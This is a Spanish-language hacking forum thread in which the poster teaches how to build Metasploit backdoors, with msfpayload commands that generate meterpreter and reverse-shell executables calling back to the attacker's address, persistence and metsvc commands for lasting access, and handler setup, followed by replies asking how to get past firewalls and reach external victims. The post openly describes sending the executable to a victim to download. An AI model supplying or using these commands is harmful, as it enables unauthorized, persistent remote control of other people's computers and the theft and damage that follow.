Como crear backdoors en metasploit.[Algunos tipos]

Iniciado por J0k3$, Agosto 18, 2013, 11:09:09 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 18, 2013, 11:09:09 PM Ultima modificación: Agosto 09, 2014, 09:43:09 AM por Expermicid

¿Que es una backdoor?
Es un programa, que ayuda al atacante a tener un acceso al pc, constante , o a dejar accesos a otros intrusos , por cualquier cuestión , es algo que deja vulnerado a tu pc al 100%.

Backdoor Meterpreter

Hoy os enseñare a hacer backdoors con metasploit, los distintos backdoors que hay :-D empecemos...Aclaro una cosa, con cualquier payload de meterpreter puedes hacer backdoor's acá les explicare unos cuantos , pero es para que investiguen ustedes :-D....
Backdoor Meterpreter.
Este backdoor, es del meterpreter para el que no sepa que es, es el "troyano" que usa metasploit,  digo troyano porque trae unas funciones añadidas, en mi opinión el mas recomendable de los backdoor ... Empecemos se crea de una forma muy sencilla ..... abren la consola y escriben...

Código: php
sudo msfpayload windows/meterpreter/reverse_tcp LHOST="Ip/No-Ip" LPORT="Puerto" X > "Ruta donde se guardara/Elnombrequequieras.exe"


Bueno , seria el típico Backdoors , seria subírselo a alguien o ponerlo para descargar y finiquitado :-D , bueno y ahora te estarás preguntando......como recibo yo la conexión de este backdoor y de cualquiera de los que veremos hoy, con el exploit, que se llama "exploit/multi/handler" con eso recibiremos todas las conexiones de nuestro backdoor, veamos un ejemplo de recibir conexiones....




Lo ven? consiguió una sesión , sencillo no? :-) , bueno este seria uno de los backdoors que hay, expliquemos unos cuantos mas ;-)

Backdoors Consola.
Este backdoor, tan simple te da la consola/terminal/prompt bueno cualquier interprete de comandos que allá en el S.O este es sencillo .....

Código: php
msfpayload windows/shell/reverse_tcp LHOST="Tu ip/noip" LPORT="Puerto" X > "ruta/elnombrequequieras.exe"

y ya esta ahora os enseño una foto de como sería....Ya saben se tiene que ejecutar en la "maquina victima".

Bueno, aquí se ve la shell obtenida! :D ...pasemos a otro...

Backdoor Persistence.
Este backdoor es persistence, un comando que trae el meterpreter , podemos ver los comandos poniendo "run persistence -h" dentro del meterpreter.....

Hay ven la información sencillo no? :D bueno pues esto se usa para darnos acceso constante a una maquina, o yo tambien la uso para darme acceso a mi mismo tener varias sesiones por si falla alguna , jeje soy malvado xD jaja :D bueno para usar este comando como ven hay en los parametros solamente pondremos..
     
Código: php
 run  persistence -U -i -p 1234 -r "ip" 

Bueno analizamos un poco, la "-U" es para que cuando el usuario inicie, lo haga también nuestra backdoors , la "-i" es el intervalo de conexión en este caso ninguno , la "-p" el puerto  inventado hay pongan el que tengan abierto xD :D  , y la "-r" es para la ip/noip a la que se le va a conectar la suya o la de su amigo para darle acceso ..... y les sale algo parecido a esto...

Bueno hay se ve, como lo pone en el registro, la pid ...etc bueno y como vemos si nos fijamos bien usa el backdoor meterpreter (PAYLOAD) del que os hable antes :-D lo pueden modificar , en la ruta del script y cambiarlo por el que quieran como una VNC o algo así .... :-D
Despues en un handler  , y el payload de el primer backdoor.... como el que vimos colocamos los datos en ese caso (el de la foto) pondríamos de LHOST 192.168.1.87 y en el del puerto 4443 , y nos daría la sesión cuando se conectara :D.......

Backdoors Metsvc.

Este es mas fácil que el otro , porque es un servicio que se instala en la pc victima, y con solo poner en meterpreter este comando.....
run metsvc -A
y ya se les instalaría solo , si ponen run metsvc -h , verán que hay muy pocos comando solo ese y 2 mas y uno es para desinstalar el servicio , muy útil , bueno acá unas fotos de como se instala automáticamente ....


Bueno , para interactuar con este, colocan el handler pero de payload ponen :

Código: php
set PAYLOAD windows/metsvc_bind_tcp


y rellenan los datos correspondientes... :-) con show options , y lo configuran..


Saludos de vuestro amigo J0K3$, y muchas gracias al amigo de Antrax. Salu2 Underc0der.

No se dejen nada abierto ;D
Dueño de The Hackers Wars : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------

sabes eludir el firewall activo me podrias decir como le haces le pongo este payload y nada

windows/meterpreter/reverse_tcp_allports

esto es para local host?? pero para host extrenos como se hace?? se que ahy que cambiar ip privada por la ip extrena pero ya lo e intentado y no eh podido mas que en lhost. buena info!! salu2!1

Abre los puertos pelumon, y te tiene que ir si o si, a no ser, que metasploit lo tengas en una maquina virtual, entonces:
Skype: trollmine99

ise un ejecutable y si me funciono con red diferente, entro a mi router y pongo mi maquina en dnz y ahora si en set lhost pongo mi ip extrena y funciona, pero no me pasa lo mismo con set solo me funciona en lhost?? sabes como??? salu2!!!